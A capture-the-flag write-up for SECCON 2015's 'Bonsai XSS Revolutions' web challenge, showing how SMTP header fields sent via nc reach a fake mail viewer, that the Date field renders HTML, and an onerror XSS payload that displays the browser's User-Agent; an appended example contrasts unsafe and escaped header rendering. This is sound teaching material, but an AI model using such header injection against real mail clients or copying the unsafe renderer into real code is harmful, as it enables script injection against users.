SECCON CTF 2015 – Bonsai XSS Revolutions (Web) – Write-up

Bonsai XSS Revolutions

Category: Web Points: 200 Solves: 49

Description:

What is your browser (User-Agent)?
Requirement: .NET Framework 4.5


The provided binary is a .NET executable that looks like a fake Windows OS.

Initially, the application starts a fake web browser and connects to a mailbox. Then, it displays new emails one by one.



First, we notice that we cannot directly interact with the application. So, let’s find a way to send emails to keigo.yamazaki@tsuribori.test.

A quick netstat check reveals that TCP port 25 (SMTP) is listening:

C:\WINDOWS\system32>netstat -onab
Connexions actives
 Proto   Adresse locale   Adresse distante   État

Let’s try to connect:

$ nc localhost 25
220 tsuribori.test Tsuribori-SMTPserver by KeigoYAMAZAKI, 2014.12.09- ESMTP

Good! An SMTP server, as expected!

Since the challenge name is related to XSS, we tried to send an HTML email, but the HTML content is not displayed…

Maybe we can inject HTML in the header fields:

HELO tsuribori.test
RCPT TO: keigo.yamazaki@tsuribori.test
From: Me<img src=0>
To: You<img src=0>
Date: Today<img src=0>
Subject: Test Message<img src=0>

This is a text message !

Which gives us:



The vulnerable field is Date, whose value is rendered as HTML. Since the flag is the browser's User-Agent, we can use this payload to display it:

<img src=0 onerror=alert(navigator.userAgent)>
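The header probe above, seen from the side of the mail viewer. This is an added example, not code from the write-up or the challenge binary. It assumes the viewer builds its HTML by concatenating header values; the function names and the SAMPLE message are constructed for illustration.

```javascript
// Added example. Function names and SAMPLE are constructed for illustration.
const SAMPLE = [
  "From: Me<img src=0>",
  "To: You<img src=0>",
  "Date: Today<img src=0>",
  "Subject: Test Message<img src=0>",
  "",
  "This is a text message !",
].join("\r\n");

// Escape the characters that can break out of an HTML text or attribute context.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (c) => map[c]);
}

// Parse the header block of a raw message, unfolding continuation lines.
function parseHeaders(raw) {
  const head = raw.split(/\r?\n\r?\n/)[0].replace(/\r?\n[ \t]+/g, " ");
  const headers = [];
  for (const line of head.split(/\r?\n/)) {
    const i = line.indexOf(":");
    if (i > 0) headers.push([line.slice(0, i).trim(), line.slice(i + 1).trim()]);
  }
  return headers;
}

// RFC 5322 date-time shape, e.g. "Sat, 05 Dec 2015 10:00:00 +0900".
const DATE_RE = /^(?:[A-Z][a-z]{2}, )?\d{1,2} [A-Z][a-z]{2} \d{4} \d{2}:\d{2}(?::\d{2})? [+-]\d{4}$/;

// Weak pattern: header values are concatenated straight into markup.
function renderUnsafe(raw) {
  return parseHeaders(raw).map(([k, v]) => `<tr><th>${k}</th><td>${v}</td></tr>`).join("\n");
}

// Hardened: every name and value is escaped; a malformed Date is also marked.
function renderSafe(raw) {
  return parseHeaders(raw).map(([k, v]) => {
    const bad = k.toLowerCase() === "date" && !DATE_RE.test(v);
    const cell = escapeHtml(v) + (bad ? " <em>(invalid date)</em>" : "");
    return `<tr><th>${escapeHtml(k)}</th><td>${cell}</td></tr>`;
  }).join("\n");
}

console.log(renderSafe(SAMPLE));
```

Escaping every header on output is the actual fix; the Date shape check only makes a malformed value visible to whoever reads the rendered view.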

